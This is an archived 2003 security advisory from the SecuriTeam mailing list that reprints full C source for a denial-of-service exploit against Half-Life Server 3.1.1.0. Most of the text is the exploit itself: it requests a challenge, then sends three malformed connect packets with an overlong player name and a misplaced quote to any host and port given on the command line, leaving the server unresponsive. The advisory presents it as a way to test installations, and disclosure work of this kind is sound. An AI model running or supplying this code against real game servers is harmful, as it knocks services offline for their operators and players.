Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:4416
HistoryApr 22, 2003 - 12:00 a.m.

[EXPL] Half-Life Exploit Code Released (Malformed Packet)

2003-04-2200:00:00
vulners.com
27

The following security advisory is sent to the securiteam mailing list, and can be found at the
SecuriTeam web site: http://www.securiteam.com

    • promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or [email protected]


Half-Life Exploit Code Released (Malformed Packet)

SUMMARY

A vulnerability in Half-Life allows an attacker to cause the server to no
longer respond to legitimate requests by sending it malformed packets. The
following exploit code can be used to test your Half-Life installation for
the vulnerability.

DETAILS

Vulnerable systems:

  • Half-Life Server 3.1.1.0 (Windows and Linux)

Exploit:
/*
This is a Denial-of-service exploit(if you can call this an exploit)
against half-life-servers (without WON-authentication).
I have tested this successfully against half-life servers Exe version
3.1.1.0 under SuSE Linux 7.3 and win2k after sending 3 special-formed
connect packets the server is un-responsible and use 100% cpu-power.
This is only a fast hack, it's a result of playing a round with the
sourcecodes from http://www.pivx.com/luigi/. And the malformed packet is a
result, of an coding-accident.
"Auch ein blindes Huhn, findet manchmal ein Korn" special thanks to
[email protected].
I have this code successfully compiled with vc++.
With some hits on your keyboard, you can compile it under Linux too, but i
have no time.

Have fun with this lame code. P.S you must link it with
WS2_32.lib!!!

`Delikon/5.4.03/[email protected]/www.delikon.de`

-----------------Binary-----------
at www.delikon.de

----------problem description-----
Mail me or look at the arrow which shows you the problem

---------patch--------------------
Hope that the half-life coders have time to code one, but i think this
have time till the next version of halflife, because this is not a serious
bug (only servers without WON-authentication can be crash)

P.S Half-Life coders the bug is some where in the
SV_CheckForDuplicateNames() function

*/
#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#include <stdio.h>
#include <stdlib.h>

int startWinsock(void)
{
WSADATA wsa;
return WSAStartup(MAKEWORD(2,0),&wsa);
}

int main(int argc, char *argv[])
{
long rc;
SOCKET s,s2,s3,s4;
SOCKADDR_IN addr;
SOCKADDR_IN remoteAddr;
char buf[256];
char challenge[256];
int remoteAddrLen=sizeof(SOCKADDR_IN);
char *connect1a;

char get[]="\xff"
"\xff\xff\xff\x67\x65\x74\x63\x68\x61\x6c"
"\x6c\x65\x6e\x67\x65\x0a\x00";

char head[]="\xff"
"\xff\xff\xff\x63\x6f\x6e\x6e\x65\x63\x74"
"\x20\x34\x36\x20";

char connect1 []= "\x20"
"\x22\x5c\x70\x72\x6f\x74"
"\x5c\x32\x5c\x75\x6e\x69\x71\x75\x65\x5c"
"\x2d\x31\x5c\x72\x61\x77\x5c"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41"
"\x22" //<β€”the problem
"\x22\x20\x22\x5c\x6d\x6f\x64"
"\x65\x6c\x5c\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x5c\x74\x6f\x70"
"\x63\x6f\x6c\x6f\x72\x5c\x31\x32\x38\x5c"
"\x62\x6f\x74\x74\x6f\x6d\x63\x6f\x6c\x6f"
"\x72\x5c\x31\x32\x38\x5c\x72\x61\x74\x65"
"\x5c\x39\x39\x39\x39\x2e\x30\x30\x30\x30"
"\x30\x30\x5c\x63\x6c\x5f\x75\x70\x64\x61"
"\x74\x65\x72\x61\x74\x65\x5c\x32\x30\x5c"
"\x63\x6c\x5f\x6c\x77\x5c\x31\x5c\x63\x6c"
"\x5f\x6c\x63\x5c\x31\x5c\x63\x6c\x5f\x64"
"\x6c\x6d\x61\x78\x5c\x31\x32\x38\x5c\x68"
"\x75\x64\x5f\x63\x6c\x61\x73\x73\x61\x75"
"\x74\x6f\x6b\x69\x6c\x6c\x5c\x31\x5c\x6e"
"\x61\x6d\x65\x5c\x74\x65\x73\x74\x22\x0a";

memset(buf,0,strlen(buf));
memset(challenge,0,strlen(challenge));

if (argc<3)
{
printf("\n%s <Remote host> <Remote port>\n", argv[0]);
exit(1);
}

else
{
printf("Denial-of-Service exploit against half-life servers version
3.1.1.0\n");
printf("Found and coded by Delikon | 7.4.03 | www.delikon.de |
[email protected] \n");

}

rc=startWinsock();

if(rc!=0)

{

printf&#40;&quot;Error : startWinsock, error code: &#37;d&#92;n&quot;,rc&#41;;
return 1;

}

s=socket(AF_INET,SOCK_DGRAM,0);

if(s==INVALID_SOCKET)
{
printf("Error: couldn't create the socket , error code:
%d\n",WSAGetLastError());
return 1;
}

addr.sin_family=AF_INET;

addr.sin_addr.s_addr =inet_addr(argv[1]);
addr.sin_port=htons(atoi(argv[2]));

rc=sendto(s,get,strlen(get),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));
if(rc==SOCKET_ERROR)
{
printf("Fehler: sendto, fehler code: %d\n",WSAGetLastError());
return 1;
}
rc=recvfrom(s,buf,256,0,(SOCKADDR*)&remoteAddr,&remoteAddrLen);

strcpy(challenge,buf+14);
challenge[strlen(challenge)-3]='\0';
printf("Challenge:%s\n",challenge);
closesocket(s);

connect1a=(char *)malloc
(sizeof(head)+sizeof(challenge)+sizeof(connect1));
strcpy(connect1a,head);
strcat(connect1a,challenge);
strcat(connect1a,connect1);

s2=socket(AF_INET,SOCK_DGRAM,0);

rc=sendto(s2,connect1a,strlen(connect1a),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));
Sleep(120);
closesocket(s2);

s3=socket(AF_INET,SOCK_DGRAM,0);

rc=sendto(s3,connect1a,strlen(connect1a),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));
Sleep(120);
closesocket(s3);

s4=socket(AF_INET,SOCK_DGRAM,0);

rc=sendto(s4,connect1a,strlen(connect1a),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));
Sleep(120);
closesocket(s4);

printf("\n\n Server is down!!! ??? or ?? check it ;-)\n\n");

exit(1);
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:[email protected]> Delikon.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
[email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]

====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages.